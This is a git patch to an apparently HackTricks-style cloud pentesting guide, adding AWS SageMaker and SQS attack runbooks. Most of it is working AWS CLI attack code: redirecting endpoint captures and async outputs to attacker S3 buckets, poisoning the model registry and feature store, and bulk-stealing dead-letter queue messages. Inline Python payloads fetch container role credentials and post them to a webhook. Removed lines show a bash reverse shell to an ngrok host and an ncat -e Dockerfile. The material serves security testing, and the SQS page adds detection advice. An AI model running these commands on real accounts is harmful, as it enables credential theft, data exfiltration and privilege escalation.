From 1719f8ed3cdca79b30554ef1bc5144b01b5e9e27 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Mon, 13 Oct 2025 22:42:54 +0200 Subject: [PATCH] f --- src/SUMMARY.md | 3 +- .../aws-sagemaker-post-exploitation/README.md | 91 ++++++-- .../feature-store-poisoning.md | 53 +++++ .../aws-sqs-dlq-redrive-exfiltration.md | 160 +++++++++++++ .../aws-sagemaker-privesc/README.md | 221 +++++++++++++----- .../aws-services/aws-sagemaker-enum/README.md | 218 +++++++++++++++++ .../README.md} | 4 +- 7 files changed, 679 insertions(+), 71 deletions(-) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md rename src/pentesting-cloud/aws-security/{aws-services/aws-sagemaker-unauthorized-access.md => aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md} (97%) diff --git a/src/SUMMARY.md b/src/SUMMARY.md index d64cbade1..3082cb521 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -396,7 +396,7 @@ - [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md) - [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md) - [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md) - - [AWS - SageMaker Unauthorized Access](pentesting-cloud/aws-security/aws-services/aws-sagemaker-unauthorized-access.md) + - [AWS - SageMaker Enum](pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md) - [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md) - [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md) - [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md) @@ -428,6 +428,7 @@ 
- [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum/README.md) - [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum/README.md) - [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum/README.md) + - [AWS - SageMaker Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md) - [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum/README.md) - [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum/README.md) - [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum/README.md) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md index 50a3af3e5..4dea41206 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md @@ -7,15 +7,15 @@ Abuse SageMaker endpoint management to enable full request/response capture to an attacker‑controlled S3 bucket without touching the model or container. Uses a zero/low‑downtime rolling update and only requires endpoint management permissions. 
### Requirements -- IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint -- S3: s3:CreateBucket (or use an existing bucket in the same account) -- Optional (if using SSE‑KMS): kms:Encrypt on the chosen CMK +- IAM: `sagemaker:DescribeEndpoint`, `sagemaker:DescribeEndpointConfig`, `sagemaker:CreateEndpointConfig`, `sagemaker:UpdateEndpoint` +- S3: `s3:CreateBucket` (or use an existing bucket in the same account) +- Optional (if using SSE‑KMS): `kms:Encrypt` on the chosen CMK - Target: An existing InService real‑time endpoint in the same account/region ### Steps 1) Identify an InService endpoint and gather current production variants -``` +```bash REGION=${REGION:-us-east-1} EP=$(aws sagemaker list-endpoints --region $REGION --query "Endpoints[?EndpointStatus=='InService']|[0].EndpointName" --output text) echo "Endpoint=$EP" @@ -26,7 +26,7 @@ aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name " 2) Prepare attacker S3 destination for captures -``` +```bash ACC=$(aws sts get-caller-identity --query Account --output text) BUCKET=ht-sm-capture-$ACC-$(date +%s) aws s3 mb s3://$BUCKET --region $REGION @@ -36,7 +36,7 @@ aws s3 mb s3://$BUCKET --region $REGION Note: Use explicit content types that satisfy CLI validation. 
-``` +```bash NEWCFG=${CFG}-dc cat > /tmp/dc.json << JSON { @@ -62,14 +62,14 @@ aws sagemaker create-endpoint-config \ 4) Apply the new config with a rolling update (minimal/no downtime) -``` +```bash aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG" aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP" ``` 5) Generate at least one inference call (optional if live traffic exists) -``` +```bash echo '{"inputs":[1,2,3]}' > /tmp/payload.json aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \ --content-type application/json --accept application/json \ @@ -78,7 +78,7 @@ aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \ 6) Validate captures in attacker S3 -``` +```bash aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize ``` @@ -92,14 +92,14 @@ aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize Abuse endpoint management to redirect asynchronous inference outputs to an attacker-controlled S3 bucket by cloning the current EndpointConfig and setting AsyncInferenceConfig.OutputConfig S3OutputPath/S3FailurePath. This exfiltrates model predictions (and any transformed inputs included by the container) without modifying the model/container. 
### Requirements -- IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint +- IAM: `sagemaker:DescribeEndpoint`, `sagemaker:DescribeEndpointConfig`, `sagemaker:CreateEndpointConfig`, `sagemaker:UpdateEndpoint` - S3: Ability to write to the attacker S3 bucket (via the model execution role or a permissive bucket policy) - Target: An InService endpoint where asynchronous invocations are (or will be) used ### Steps 1) Gather current ProductionVariants from the target endpoint -``` +```bash REGION=${REGION:-us-east-1} EP= CUR_CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text) @@ -108,7 +108,7 @@ aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name " 2) Create an attacker bucket (ensure the model execution role can PutObject to it) -``` +```bash ACC=$(aws sts get-caller-identity --query Account --output text) BUCKET=ht-sm-async-exfil-$ACC-$(date +%s) aws s3 mb s3://$BUCKET --region $REGION || true @@ -116,7 +116,7 @@ aws s3 mb s3://$BUCKET --region $REGION || true 3) Clone EndpointConfig and hijack AsyncInference outputs to the attacker bucket -``` +```bash NEWCFG=${CUR_CFG}-async-exfil cat > /tmp/async_cfg.json << JSON {"OutputConfig": {"S3OutputPath": "s3://$BUCKET/async-out/", "S3FailurePath": "s3://$BUCKET/async-fail/"}} @@ -128,7 +128,7 @@ aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP" 4) Trigger an async invocation and verify objects land in attacker S3 -``` +```bash aws s3 cp /etc/hosts s3://$BUCKET/inp.bin aws sagemaker-runtime invoke-endpoint-async --region $REGION --endpoint-name "$EP" --input-location s3://$BUCKET/inp.bin >/tmp/async.json || true sleep 30 @@ -139,4 +139,65 @@ aws s3 ls s3://$BUCKET/async-fail/ --recursive || true ### Impact - Redirects asynchronous inference results (and error bodies) to attacker-controlled S3, enabling covert exfiltration of 
predictions and potentially sensitive pre/post-processed inputs produced by the container, without changing model code or image and with minimal/no downtime. -{{#include ../../../../banners/hacktricks-training.md}} + +## SageMaker Model Registry supply-chain injection via CreateModelPackage(Approved) + +If an attacker can CreateModelPackage on a target SageMaker Model Package Group, they can register a new model version that points to an attacker-controlled container image and immediately mark it Approved. Many CI/CD pipelines auto-deploy Approved model versions to endpoints or training jobs, resulting in attacker code execution under the service’s execution roles. Cross-account exposure can be amplified by a permissive ModelPackageGroup resource policy. + +### Requirements +- IAM (minimum to poison an existing group): `sagemaker:CreateModelPackage` on the target ModelPackageGroup +- Optional (to create a group if one doesn’t exist): `sagemaker:CreateModelPackageGroup` +- S3: Read access to referenced ModelDataUrl (or host attacker-controlled artifacts) +- Target: A Model Package Group that downstream automation watches for Approved versions + +### Steps +1) Set region and create/find a target Model Package Group +```bash +REGION=${REGION:-us-east-1} +MPG=victim-group-$(date +%s) +aws sagemaker create-model-package-group --region $REGION --model-package-group-name $MPG --model-package-group-description "test group" +``` + +2) Prepare dummy model data in S3 +```bash +ACC=$(aws sts get-caller-identity --query Account --output text) +BUCKET=ht-sm-mpkg-$ACC-$(date +%s) +aws s3 mb s3://$BUCKET --region $REGION +head -c 1024 /tmp/model.tar.gz +aws s3 cp /tmp/model.tar.gz s3://$BUCKET/model/model.tar.gz --region $REGION +``` + +3) Register a malicious (here benign) Approved model package version referencing a public AWS DLC image +```bash +IMG="683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3" +cat > /tmp/inf.json << JSON +{ + "Containers": 
[ + { + "Image": "$IMG", + "ModelDataUrl": "s3://$BUCKET/model/model.tar.gz" + } + ], + "SupportedContentTypes": ["text/csv"], + "SupportedResponseMIMETypes": ["text/csv"] +} +JSON +aws sagemaker create-model-package --region $REGION --model-package-group-name $MPG --model-approval-status Approved --inference-specification file:///tmp/inf.json +``` + +4) Verify the new Approved version exists +```bash +aws sagemaker list-model-packages --region $REGION --model-package-group-name $MPG --output table +``` + +### Impact +- Poison the Model Registry with an Approved version that references attacker-controlled code. Pipelines that auto-deploy Approved models may pull and run the attacker image, yielding code execution under endpoint/training roles. +- With a permissive ModelPackageGroup resource policy (PutModelPackageGroupPolicy), this abuse can be triggered cross-account. + +## Feature store poisoning + +Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. This does not require access to models or endpoints. + +{{#ref}} +feature-store-poisoning.md +{{/ref}} \ No newline at end of file diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md new file mode 100644 index 000000000..153174d9c --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md @@ -0,0 +1,53 @@ +# SageMaker Feature Store online store poisoning + +Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. 
This does not require access to models or endpoints. + +## Requirements +- Permissions: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord` +- Target: Feature Group with OnlineStore enabled (typically backing real-time inference) + +## Steps +1) Pick or create a small Online Feature Group for testing +```bash +REGION=${REGION:-us-east-1} +FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text) +if [ -z "$FG" -o "$FG" = "None" ]; then + ACC=$(aws sts get-caller-identity --query Account --output text) + FG=ht-fg-$ACC-$(date +%s) + ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole) + aws sagemaker create-feature-group --region $REGION --feature-group-name "$FG" --record-identifier-feature-name entity_id --event-time-feature-name event_time --feature-definitions "[{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}]" --online-store-config "{\"EnableOnlineStore\":true}" --role-arn "$ROLE_ARN" + echo "Waiting for feature group to be in Created state..." 
+ for i in $(seq 1 40); do + ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true) + echo $ST; [ "$ST" = "Created" ] && break; sleep 15 + done +fi +``` + +2) Insert/overwrite an online record (poison) +```bash +NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) +cat > /tmp/put.json << JSON +{ + "FeatureGroupName": "$FG", + "Record": [ + {"FeatureName": "entity_id", "ValueAsString": "user-123"}, + {"FeatureName": "event_time", "ValueAsString": "$NOW"}, + {"FeatureName": "risk_score", "ValueAsString": "0.99"} + ], + "TargetStores": ["OnlineStore"] +} +JSON +aws sagemaker-featurestore-runtime put-record --region $REGION --cli-input-json file:///tmp/put.json +``` + +3) Read back the record to confirm manipulation +```bash +aws sagemaker-featurestore-runtime get-record --region $REGION --feature-group-name "$FG" --record-identifier-value-as-string user-123 --feature-name risk_score --query "Record[0].ValueAsString" +``` + +Expected: risk_score returns 0.99 (attacker-set), proving ability to change online features consumed by models. + +## Impact +- Real-time integrity attack: manipulate features used by production models without touching endpoints/models. +- Confidentiality risk: read sensitive features via GetRecord from OnlineStore. diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md new file mode 100644 index 000000000..c915912ec --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md @@ -0,0 +1,160 @@ +# AWS – SQS DLQ Redrive Exfiltration via StartMessageMoveTask + +## Description + +Abuse SQS message move tasks to steal all accumulated messages from a victim's Dead-Letter Queue (DLQ) by redirecting them to an attacker-controlled queue using `sqs:StartMessageMoveTask`. 
This technique exploits AWS's legitimate message recovery feature to exfiltrate sensitive data that has accumulated in DLQs over time. + +## What is a Dead-Letter Queue (DLQ)? + +A Dead-Letter Queue is a special SQS queue where messages are automatically sent when they fail to be processed successfully by the main application. These failed messages often contain: +- Sensitive application data that couldn't be processed +- Error details and debugging information +- Personal Identifiable Information (PII) +- API tokens, credentials, or other secrets +- Business-critical transaction data + +DLQs act as a "graveyard" for failed messages, making them valuable targets since they accumulate sensitive data over time that applications couldn't handle properly. + +## Attack Scenario + +**Real-world example:** +1. **E-commerce application** processes customer orders through SQS +2. **Some orders fail** (payment issues, inventory problems, etc.) and get moved to a DLQ +3. **DLQ accumulates** weeks/months of failed orders containing customer data: `{"customerId": "12345", "creditCard": "4111-1111-1111-1111", "orderTotal": "$500"}` +4. **Attacker gains access** to AWS credentials with SQS permissions +5. **Attacker discovers** the DLQ contains thousands of failed orders with sensitive data +6. **Instead of trying to access individual messages** (slow and obvious), attacker uses `StartMessageMoveTask` to bulk transfer ALL messages to their own queue +7. **Attacker extracts** all historical sensitive data in one operation + +## Requirements +- The source queue must be configured as a DLQ (referenced by at least one queue RedrivePolicy). +- IAM permissions (run as the compromised victim principal): + - On DLQ (source): `sqs:StartMessageMoveTask`, `sqs:GetQueueAttributes`. + - On destination queue: permission to deliver messages (e.g., queue policy allowing `sqs:SendMessage` from the victim principal). For same-account destinations this is typically allowed by default. 
+ - If SSE-KMS is enabled: on source CMK `kms:Decrypt`, and on destination CMK `kms:GenerateDataKey`, `kms:Encrypt`. + +## Impact +Exfiltrate sensitive payloads accumulated in DLQs (failed events, PII, tokens, application payloads) at high speed using native SQS APIs. Works cross-account if the destination queue policy allows `SendMessage` from the victim principal. + +## How to Abuse + +- Identify the victim DLQ ARN and ensure it is actually referenced as a DLQ by some queue (any queue is fine). +- Create or choose an attacker-controlled destination queue and get its ARN. +- Start a message move task from the victim DLQ to your destination queue. +- Monitor progress or cancel if needed. + +### CLI Example: Exfiltrating Customer Data from E-commerce DLQ + +**Scenario**: An attacker has compromised AWS credentials and discovered that an e-commerce application uses SQS with a DLQ containing failed customer order processing attempts. + +1) **Discover and examine the victim DLQ** + +```bash +# List queues to find DLQs (look for names containing 'dlq', 'dead', 'failed', etc.) +aws sqs list-queues --queue-name-prefix dlq + +# Let's say we found: https://sqs.us-east-1.amazonaws.com/123456789012/ecommerce-orders-dlq +VICTIM_DLQ_URL="https://sqs.us-east-1.amazonaws.com/123456789012/ecommerce-orders-dlq" +SRC_ARN=$(aws sqs get-queue-attributes --queue-url "$VICTIM_DLQ_URL" --attribute-names QueueArn --query Attributes.QueueArn --output text) + +# Check how many messages are in the DLQ (potential treasure trove!) 
+aws sqs get-queue-attributes --queue-url "$VICTIM_DLQ_URL" \ + --attribute-names ApproximateNumberOfMessages +# Output might show: "ApproximateNumberOfMessages": "1847" +``` + +2) **Create attacker-controlled destination queue** + +```bash +# Create our exfiltration queue +ATTACKER_Q_URL=$(aws sqs create-queue --queue-name hacker-exfil-$(date +%s) --query QueueUrl --output text) +ATTACKER_Q_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_Q_URL" --attribute-names QueueArn --query Attributes.QueueArn --output text) + +echo "Created exfiltration queue: $ATTACKER_Q_ARN" +``` + +3) **Execute the bulk message theft** + +```bash +# Start moving ALL messages from victim DLQ to our queue +# This operation will transfer thousands of failed orders containing customer data +echo "Starting bulk exfiltration of $SRC_ARN to $ATTACKER_Q_ARN" +TASK_RESPONSE=$(aws sqs start-message-move-task \ + --source-arn "$SRC_ARN" \ + --destination-arn "$ATTACKER_Q_ARN" \ + --max-number-of-messages-per-second 100) + +echo "Move task started: $TASK_RESPONSE" + +# Monitor the theft progress +aws sqs list-message-move-tasks --source-arn "$SRC_ARN" --max-results 10 +``` + +4) **Harvest the stolen sensitive data** + +```bash +# Receive the exfiltrated customer data +echo "Receiving stolen customer data..." 
+aws sqs receive-message --queue-url "$ATTACKER_Q_URL" \ + --attribute-names All --message-attribute-names All \ + --max-number-of-messages 10 --wait-time-seconds 5 + +# Example of what an attacker might see: +# { +# "Body": "{\"customerId\":\"cust_12345\",\"email\":\"john@example.com\",\"creditCard\":\"4111-1111-1111-1111\",\"orderTotal\":\"$299.99\",\"failureReason\":\"Payment declined\"}", +# "MessageId": "12345-abcd-6789-efgh" +# } + +# Continue receiving all messages in batches +while true; do + MESSAGES=$(aws sqs receive-message --queue-url "$ATTACKER_Q_URL" \ + --max-number-of-messages 10 --wait-time-seconds 2 --output json) + + if [ "$(echo "$MESSAGES" | jq '.Messages | length')" -eq 0 ]; then + echo "No more messages - exfiltration complete!" + break + fi + + echo "Received batch of stolen data..." + # Process/save the stolen customer data + echo "$MESSAGES" >> stolen_customer_data.json +done +``` + +### Cross-account notes +- The destination queue must have a resource policy allowing the victim principal to `sqs:SendMessage` (and, if used, KMS grants/permissions). + +## Why This Attack is Effective + +1. **Legitimate AWS Feature**: Uses built-in AWS functionality, making it hard to detect as malicious +2. **Bulk Operation**: Transfers thousands of messages quickly instead of slow individual access +3. **Historical Data**: DLQs accumulate sensitive data over weeks/months +4. **Under the Radar**: Many organizations don't monitor DLQ access closely +5. 
**Cross-Account Capable**: Can exfiltrate to attacker's own AWS account if permissions allow + +## Detection and Prevention + +### Detection +Monitor CloudTrail for suspicious `StartMessageMoveTask` API calls: +```json +{ + "eventName": "StartMessageMoveTask", + "sourceIPAddress": "suspicious-ip", + "userIdentity": { + "type": "IAMUser", + "userName": "compromised-user" + }, + "requestParameters": { + "sourceArn": "arn:aws:sqs:us-east-1:123456789012:sensitive-dlq", + "destinationArn": "arn:aws:sqs:us-east-1:attacker-account:exfil-queue" + } +} +``` + +### Prevention +1. **Least Privilege**: Restrict `sqs:StartMessageMoveTask` permissions to only necessary roles +2. **Monitor DLQs**: Set up CloudWatch alarms for unusual DLQ activity +3. **Cross-Account Policies**: Carefully review SQS queue policies allowing cross-account access +4. **Encrypt DLQs**: Use SSE-KMS with restricted key policies +5. **Regular Cleanup**: Don't let sensitive data accumulate in DLQs indefinitely + diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md index c6e0080dc..39768270c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md @@ -37,79 +37,175 @@ aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name .dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \ - --role-arn +REGION= +ROLE_ARN= +IMAGE=683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3 +ENV='{"W":"https://example.com/webhook"}' -# In my tests it took 10min to receive the shell -curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds 
+aws sagemaker create-processing-job \
+  --processing-job-name privescjob \
+  --processing-resources '{"ClusterConfig":{"InstanceCount":1,"InstanceType":"ml.t3.medium","VolumeSizeInGB":50}}' \
+  --app-specification "{\"ImageUri\":\"$IMAGE\",\"ContainerEntrypoint\":[\"python\",\"-c\"],\"ContainerArguments\":[\"import os,urllib.request as u;m=os.environ.get('AWS_CONTAINER_CREDENTIALS_RELATIVE_URI');m and u.urlopen(os.environ['W'],data=u.urlopen('http://169.254.170.2'+m).read())\"]}" \
+  --environment "$ENV" \
+  --role-arn $ROLE_ARN
+
+# The credentials are delivered to the indicated webhook. Make sure the role has ECR permissions (AmazonEC2ContainerRegistryReadOnly) to pull the image.
 ```
 
 **Potential Impact:** Privesc to the sagemaker service role specified.
 
 ### `sagemaker:CreateTrainingJob`, `iam:PassRole`
 
-An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role.
-
-> [!WARNING]
-> This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job).
->
-> ```bash
-> # Create docker image
-> mkdir /tmp/rev
-> ## Note that the trainning job is going to call an executable called "train"
-> ## That's why I'm putting the rev shell in /bin/train
-> ## Set the values of and
-> cat > /tmp/rev/Dockerfile < FROM ubuntu
-> RUN apt update && apt install -y ncat curl
-> RUN printf '#!/bin/bash\nncat -e /bin/sh' > /bin/train
-> RUN chmod +x /bin/train
-> CMD ncat -e /bin/sh
-> EOF
->
-> cd /tmp/rev
-> sudo docker build . -t reverseshell
->
-> # Upload it to ECR
-> sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/
-> sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest
-> sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest
-> ```
+An attacker with those permissions can launch a training job that executes arbitrary code with the supplied role. By using an official SageMaker container and overriding the entrypoint with an inline payload, there is no need to build custom images:
 
 ```bash
-# Create trainning job with the docker image created
-aws sagemaker create-training-job \
-  --training-job-name privescjob \
-  --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
-  --algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
-  --role-arn \
-  --output-data-config '{"S3OutputPath": "s3://"}' \
-  --stopping-condition '{"MaxRuntimeInSeconds": 600}'
+REGION=
+ROLE_ARN=
+IMAGE=763104351884.dkr.ecr.$REGION.amazonaws.com/pytorch-training:2.1-cpu-py310
+ENV='{"W":"https://example.com/webhook"}'
+OUTPUT_S3=s3:///training-output/
+# The role must be able to pull images from ECR (e.g. AmazonEC2ContainerRegistryReadOnly) and write to OUTPUT_S3.
-#To get the creds
-curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
-## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
+aws sagemaker create-training-job \
+  --training-job-name privesc-train \
+  --role-arn $ROLE_ARN \
+  --algorithm-specification "{\"TrainingImage\":\"$IMAGE\",\"TrainingInputMode\":\"File\",\"ContainerEntrypoint\":[\"python\",\"-c\"],\"ContainerArguments\":[\"import os,urllib.request as u;m=os.environ.get('AWS_CONTAINER_CREDENTIALS_RELATIVE_URI');m and u.urlopen(os.environ['W'],data=u.urlopen('http://169.254.170.2'+m).read())\"]}" \
+  --output-data-config "{\"S3OutputPath\":\"$OUTPUT_S3\"}" \
+  --resource-config '{"InstanceCount":1,"InstanceType":"ml.m5.large","VolumeSizeInGB":50}' \
+  --stopping-condition '{"MaxRuntimeInSeconds":600}' \
+  --environment "$ENV"
+
+# The payload executes as soon as the job transitions to InProgress and exfiltrates the role's credentials.
 ```
 
-**Potential Impact:** Privesc to the sagemaker service role specified.
+**Potential Impact:** Privesc to the SageMaker service role specified.
 
 ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
 
-An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\
-_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._
+An attacker with those permissions can launch a HyperParameter Tuning Job that runs attacker-controlled code under the supplied role. 
Script mode requires hosting the payload in S3, but all steps can be automated from the CLI:
+
+```bash
+REGION=
+ROLE_ARN=
+BUCKET=sm-hpo-privesc-$(date +%s)
+aws s3 mb s3://$BUCKET --region $REGION
+
+# Allow public reads so any SageMaker role can pull the code
+aws s3api put-public-access-block \
+  --bucket $BUCKET \
+  --public-access-block-configuration '{
+    "BlockPublicAcls": false,
+    "IgnorePublicAcls": false,
+    "BlockPublicPolicy": false,
+    "RestrictPublicBuckets": false
+  }'
+
+aws s3api put-bucket-policy --bucket $BUCKET --policy "{
+  \"Version\": \"2012-10-17\",
+  \"Statement\": [
+    {
+      \"Effect\": \"Allow\",
+      \"Principal\": \"*\",
+      \"Action\": \"s3:GetObject\",
+      \"Resource\": \"arn:aws:s3:::$BUCKET/*\"
+    }
+  ]
+}"
+
+cat <<'EOF' > /tmp/train.py
+import os, time, urllib.request
+
+def main():
+    meta = os.environ.get("AWS_CONTAINER_CREDENTIALS_RELATIVE_URI")
+    if not meta:
+        return
+    creds = urllib.request.urlopen(f"http://169.254.170.2{meta}").read()
+    req = urllib.request.Request(
+        "https://example.com/webhook",
+        data=creds,
+        headers={"Content-Type": "application/json"}
+    )
+    urllib.request.urlopen(req)
+    print("train:loss=0")
+    time.sleep(300)
+
+if __name__ == "__main__":
+    main()
+EOF
+
+cd /tmp
+tar -czf code.tar.gz train.py
+aws s3 cp code.tar.gz s3://$BUCKET/code/train-code.tar.gz --region $REGION --acl public-read
+
+echo "dummy" > /tmp/input.txt
+aws s3 cp /tmp/input.txt s3://$BUCKET/input/dummy.txt --region $REGION --acl public-read
+
+IMAGE=763104351884.dkr.ecr.$REGION.amazonaws.com/pytorch-training:2.1-cpu-py310
+CODE_S3=s3://$BUCKET/code/train-code.tar.gz
+TRAIN_INPUT_S3=s3://$BUCKET/input
+OUTPUT_S3=s3://$BUCKET/output
+# The role needs ECR permissions and write access to the bucket.
+ +cat > /tmp/hpo-definition.json < \ --user-settings ExecutionRole=$ROLE_ARN -# 3) Verify the role change took effect aws sagemaker describe-user-profile \ --domain-id \ --user-profile-name \ --query 'UserSettings.ExecutionRole' --output text -# 4) Launch a JupyterServer app (or generate a presigned URL) so new sessions assume the swapped role +# 3) If the tenant uses Studio Spaces, swap the ExecutionRole at the space level +aws sagemaker update-space \ + --domain-id \ + --space-name \ + --space-settings ExecutionRole=$ROLE_ARN + +aws sagemaker describe-space \ + --domain-id \ + --space-name \ + --query 'SpaceSettings.ExecutionRole' --output text + +# 4) Optionally, change the domain default so every profile inherits the new role +aws sagemaker update-domain \ + --domain-id \ + --default-user-settings ExecutionRole=$ROLE_ARN + +aws sagemaker describe-domain \ + --domain-id \ + --query 'DefaultUserSettings.ExecutionRole' --output text + +# 5) Launch a JupyterServer app (or generate a presigned URL) so new sessions assume the swapped role aws sagemaker create-app \ --domain-id \ --user-profile-name \ diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md new file mode 100644 index 000000000..8767144ba --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md @@ -0,0 +1,218 @@ +# AWS - SageMaker Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Service Overview + +Amazon SageMaker is AWS' managed machine-learning platform that glues together notebooks, training infrastructure, orchestration, registries, and managed endpoints. A compromise of SageMaker resources typically provides: + +- Long-lived IAM execution roles with broad S3, ECR, Secrets Manager, or KMS access. +- Access to sensitive datasets stored in S3, EFS, or inside feature stores. 
